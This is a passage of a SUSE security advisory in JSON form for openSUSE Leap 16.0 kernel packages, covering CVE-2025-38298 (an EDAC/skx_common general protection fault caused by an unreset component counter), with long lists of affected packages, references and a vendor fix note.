"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-38297"
},
{
"cve": "CVE-2025-38298",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38298"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nEDAC/skx_common: Fix general protection fault\n\nAfter loading i10nm_edac (which automatically loads skx_edac_common), if\nunload only i10nm_edac, then reload it and perform error injection testing,\na general protection fault may occur:\n\n mce: [Hardware Error]: Machine check events logged\n Oops: general protection fault ...\n ...\n Workqueue: events mce_gen_pool_process\n RIP: 0010:string+0x53/0xe0\n ...\n Call Trace:\n \u003cTASK\u003e\n ? die_addr+0x37/0x90\n ? exc_general_protection+0x1e7/0x3f0\n ? asm_exc_general_protection+0x26/0x30\n ? string+0x53/0xe0\n vsnprintf+0x23e/0x4c0\n snprintf+0x4d/0x70\n skx_adxl_decode+0x16a/0x330 [skx_edac_common]\n skx_mce_check_error.part.0+0xf8/0x220 [skx_edac_common]\n skx_mce_check_error+0x17/0x20 [skx_edac_common]\n ...\n\nThe issue arose was because the variable \u0027adxl_component_count\u0027 (inside\nskx_edac_common), which counts the ADXL components, was not reset. During\nthe reloading of i10nm_edac, the count was incremented by the actual number\nof ADXL components again, resulting in a count that was double the real\nnumber of ADXL components. This led to an out-of-bounds reference to the\nADXL component array, causing the general protection fault above.\n\nFix this issue by resetting the \u0027adxl_component_count\u0027 in adxl_put(),\nwhich is called during the unloading of {skx,i10nm}_edac.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38298",
"url": "https://www.suse.com/security/cve/CVE-2025-38298"
},
{
"category": "external",
"summary": "SUSE Bug 1253079 for CVE-2025-38298",
"url": "https://bugzilla.suse.com/1253079"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
